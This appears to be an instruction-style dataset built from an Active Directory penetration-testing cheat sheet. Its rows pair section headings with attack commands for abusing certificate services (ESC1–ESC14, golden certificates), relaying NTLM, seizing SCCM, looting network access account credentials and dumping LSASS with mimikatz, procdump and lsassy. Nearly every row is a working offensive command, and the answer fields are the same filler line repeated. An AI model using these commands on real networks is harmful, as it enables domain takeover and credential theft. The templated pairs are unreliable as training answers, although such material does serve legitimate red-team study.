instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
Vulnerable PKI Object access control
Golden certificate
Note or procedural step under 'Vulnerable PKI Object access control'.
Vulnerable PKI Object access control
certipy ca -backup -u <user>@<domain> -hashes <hash_nt> -ca <ca_name> -debug -target <ca_ip>
Note or procedural step under 'Vulnerable PKI Object access control'.
Vulnerable PKI Object access control
certipy forge -ca-pfx '<adcs>.pfx' -upn administrator@<domain> # Pass the Certificate
Note or procedural step under 'Vulnerable PKI Object access control'.
Misconfigured Certificate Authority
ESC6
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
Abuse ATTRIBUTESUBJECTALTNAME2 flag set on CA you can choose any certificate template that permits client authentication
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
ESC1
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
ESC11
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
ntlmrelayx.py -t rpc://<ca_ip> -smb2support -rpc-mode ICPR -icpr-ca-name <ca_name>
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
Tool or command referenced under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
gettgtpkinit.py -pfx-base64 $(cat cert.b64) <domain>/<dc_name>$ <ccache_file>
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
certipy relay -target rpc://<ip_ca> -ca '<ca_name>'
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
certipy auth -pfx <certificate> -dc-ip <dc_ip> #Pass the Ticket #DCSYNC #Domain Admin
Note or procedural step under 'Misconfigured Certificate Authority'.
Abuse Certificate Mapping
ESC9/ESC10 (implicit)
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
certipy shadow auto -username <accountA>@<domain> -p <passA> -account <accountB>
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
ESC9/ESC10 (Case 1)
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
certipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn Administrator
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
ESC9
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
certipy req -username <accountB>@<domain> -hashes <hashB> -ca <ca_name> -template <vulnerable template> #reset accountB UPN
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
ESC10 (case 1)
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
certipy req -username <accountB>@<domain> -hashes <hashB> -ca <ca_name> -template <any template with client auth> #reset accountB UPN
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
ESC10 (Case 2)
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
certipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn '<dc_name$>@<domain>'
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
ESC10 Case1
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
reset accountB UPN
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
certipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn <accountB>@<domain>
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
[Kerberos Mapping] ESC9/ESC10(Case 1) #Pass The Certificate
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
[Schannel Mapping] ESC9/ESC10 (Case 2) #Pass The Certificate
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
ESC14 (explicit)
Note or procedural step under 'Abuse Certificate Mapping'.
recon
sccmhunter.py find -u <user> -p <password> -d <domain> -dc-ip <dc_ip> -debug
Note or procedural step under 'recon'.
recon
sccmhunter.py show -all
Note or procedural step under 'recon'.
recon
ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> sccm
Note or procedural step under 'recon'.
recon
nxc smb <sccm_server> -u <user> -p <password> -d <domain> --shares
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Creds-1 No credentials
Extract from pxe See no creds
Note or procedural step under 'Creds-1 No credentials'.
Creds-1 No credentials > PXE
NAA credentials
Note or procedural step under 'Creds-1 No credentials > PXE'.
Creds-1 No credentials > PXE
User + Pass
Note or procedural step under 'Creds-1 No credentials > PXE'.
Elevate-1:Relay on site systems Simple user
coerce sccm site server
Note or procedural step under 'Elevate-1:Relay on site systems Simple user'.
Elevate-1:Relay on site systems Simple user
ntlmrelayx.py -tf <site_systems> -smb2support #Admin on Site system
Note or procedural step under 'Elevate-1:Relay on site systems Simple user'.
Elevate-2:Force client push Simple user
ntlmrelayx.py -t <sccm_server> -smb2support -socks # listen connection
Note or procedural step under 'Elevate-2:Force client push Simple user'.
Elevate-2:Force client push Simple user
SharpSCCM.exe invoke client-push -mp <sccm_server>.<domain> -sc <site_code> -t <attacker_ip> # Launch client push install
Note or procedural step under 'Elevate-2:Force client push Simple user'.
Elevate-2:Force client push Simple user
proxychains smbexec.py -no-pass <domain>/<socks_user>@<sccm_server>
Note or procedural step under 'Elevate-2:Force client push Simple user'.
Elevate-2:Force client push Simple user
cleanup #Admin
Note or procedural step under 'Elevate-2:Force client push Simple user'.
Elevate-3:Automatic client push Simple user
Create DNS A record for non existing computer x
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
Elevate-3:Automatic client push Simple user
dnstool.py -u '<domain>\<user>' -p <pass> -r <newcomputer>.<domain> -a add -t A -d <attacker_ip> <dc_ip>
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
Elevate-3:Automatic client push Simple user
Enroll new computer x in AD then remove host SPN from the machine account
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
Elevate-3:Automatic client push Simple user
setspn -D host/<newcomputer> <newcomputer> setspn -D host/<newcomputer>.<domain> <newcomputer>
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
Elevate-3:Automatic client push Simple user
wait 5m for client push
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
Elevate-3:Automatic client push Simple user
ntlmrelayx.py -tf <no_signing_target> -smb2support -socks
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
Elevate-3:Automatic client push Simple user
cleanup #Relay ntlm
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
CRED-6 Loot creds
SCCM SMB service (445/TCP) on a DP
Note or procedural step under 'CRED-6 Loot creds'.
CRED-6 Loot creds
cmloot.py <domain>/<user>:<password>@<sccm_dp> -cmlootinventory sccmfiles.txt
Note or procedural step under 'CRED-6 Loot creds'.
CRED-6 Loot creds
SCCM HTTP service (80/TCP or 443/TCP) on a DP
Note or procedural step under 'CRED-6 Loot creds'.
CRED-6 Loot creds
SCCMSecrets.py policies -mp http://<management_point> -u '<machine_account>$' -p '<machine_password>' -cn '<client_name>'
Note or procedural step under 'CRED-6 Loot creds'.
CRED-6 Loot creds
SCCMSecrets.py files -dp http://<distribution_point> -u '<user>' -p '<password>'
Note or procedural step under 'CRED-6 Loot creds'.
CRED-6 Loot creds
sccm-http-looter -server <ip_dp>
Note or procedural step under 'CRED-6 Loot creds'.
Takeover-1:relay to mssql db Simple user
SCCM MSSQL != SSCM server
Note or procedural step under 'Takeover-1:relay to mssql db Simple user'.
Takeover-1:relay to mssql db Simple user
sccmhunter.py mssql -u <user> -p <password> -d <domain> -dc-ip <dc_ip> -debug -tu <target_user> -sc <site_code> -stacked
Note or procedural step under 'Takeover-1:relay to mssql db Simple user'.
Takeover-1:relay to mssql db Simple user
ntlmrelayx.py -smb2support -ts -t mssql://<sccm_mssql> -q "<query>"
Note or procedural step under 'Takeover-1:relay to mssql db Simple user'.
Takeover-1:relay to mssql db Simple user
coerce sccm_mssql -> attacker
Note or procedural step under 'Takeover-1:relay to mssql db Simple user'.
Takeover-1:relay to mssql db Simple user
sccmhunter.py admin -u <target_user>@<domain> -p '<password>' -ip <sccm_ip> #SCCM ADMIN
Note or procedural step under 'Takeover-1:relay to mssql db Simple user'.
Takeover-2:relay to mssql server Simple user
SCCM MSSQL != SSCM server
Note or procedural step under 'Takeover-2:relay to mssql server Simple user'.
Takeover-2:relay to mssql server Simple user
ntlmrelayx.py -t <sccm_mssql> -smb2support -socks
Note or procedural step under 'Takeover-2:relay to mssql server Simple user'.
Takeover-2:relay to mssql server Simple user
coerce sccm_server
Note or procedural step under 'Takeover-2:relay to mssql server Simple user'.
Takeover-2:relay to mssql server Simple user
proxychains smbexec.py -no-pass <domain>/'<sccm_server>$'@<sccm_ip> #Admin MSSQL
Note or procedural step under 'Takeover-2:relay to mssql server Simple user'.
Creds-2:Policy Request Credentials Simple user
add computer
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-2:Policy Request Credentials Simple user
sccmwtf.py newcomputer newcomputer.<domain> <target> '<domain>\<computer_added>$' '<computer_pass>'
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-2:Policy Request Credentials Simple user
get NetworkAccessUsername and NetworkAccessPassword
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-2:Policy Request Credentials Simple user
policysecretunobfuscate.py
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-2:Policy Request Credentials Simple user
delete device created after sccmadmin #User + Pass
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-2:Policy Request Credentials Simple user
SharpSCCM.exe get secrets -r newcomputer -u <computer_added>$ -p <computer_pass>"
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-2:Policy Request Credentials Simple user
cleanup #User + Pass
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-3Creds-4 Computer Admin user
dploot.py sccm -u <admin> -p '<password>' <sccm_target> #NAA credentials
Note or procedural step under 'Creds-3Creds-4 Computer Admin user'.
Creds-3Creds-4 Computer Admin user
sccmhunter.py dpapi -u <admin> -p '<password>' -target <sccm_target> -debug #NAA credentials
Note or procedural step under 'Creds-3Creds-4 Computer Admin user'.
Creds-3Creds-4 Computer Admin user
SharpSCCM.exe local secrets -m disk #NAA credentials
Note or procedural step under 'Creds-3Creds-4 Computer Admin user'.
Creds-3Creds-4 Computer Admin user
SharpSCCM.exe local secrets -m wmi #NAA credentials
Note or procedural step under 'Creds-3Creds-4 Computer Admin user'.
Creds-5 SCCM admin
secretsdump.py <domain>/<admin>:'<pass>'@<sccm_target>
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Creds-5 SCCM admin
mssqlclient.py -windows-auth -hashes '<sccm_target_hashNT>' '<domain>/<sccm_target>$'@<sccm_mssql>
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
use CM_<site_code>;
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
SELECT * FROM SC_UserAccount;
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
sccmdecryptpoc.exe <cyphered_value> #Site DB credentials
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
get_device <hostname>
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
interact <device_id>
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
script xploit.ps1 #Site DB credentials
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
EXEC-1/2 SCCM admin
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
SharpSCCM.exe exec -p <binary> -d <device_name> -sms <SMS_PROVIDER> -sc <SITECODE> --no-banner #lat
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
sccmhunter.py admin -u <user>@<domain> -p '<password>' -ip <sccm_ip> #lat
Note or procedural step under 'Creds-5 SCCM admin'.
Cleanup
SharpSCCM.exe get devices -sms <SMS_PROVIDER> -sc <SITECODE> -n <NTLMRELAYX_LISTENER_IP> -p "Name" -p "ResourceId" -p "SMSUniqueIdentifier"
Note or procedural step under 'Cleanup'.
Cleanup
SharpSCCM.exe remove device GUID:<GUID> -sms <SMS_PROVIDER> -sc <SITECODE>
Note or procedural step under 'Cleanup'.
Post exploit
as sccm admin
Note or procedural step under 'Post exploit'.
Post exploit
SCCMHound.exe --server <server> --sitecode <sitecode>
Note or procedural step under 'Post exploit'.
Post exploit
Users sessions
Note or procedural step under 'Post exploit'.
Admin access
Extract credentials from LSASS.exe
Note or procedural step under 'Admin access'.
Admin access
LSASS as protected process
Note or procedural step under 'Admin access'.
Admin access
PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp #before 2022-07-22 update
Note or procedural step under 'Admin access'.
Admin access
mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe" "!-"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Admin access
Extract LSASS secrets
Note or procedural step under 'Admin access'.
Admin access
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Note or procedural step under 'Admin access'.
Admin access
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Admin access
msf> load kiwi creds_all
Tool or command referenced under 'Admin access'.
Admin access
nxc smb <ip_range> -u <user> -p <password> -M lsassy
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Admin access
lsassy -d <domain> -u <user> -p <password> <ip>
Note or procedural step under 'Admin access'.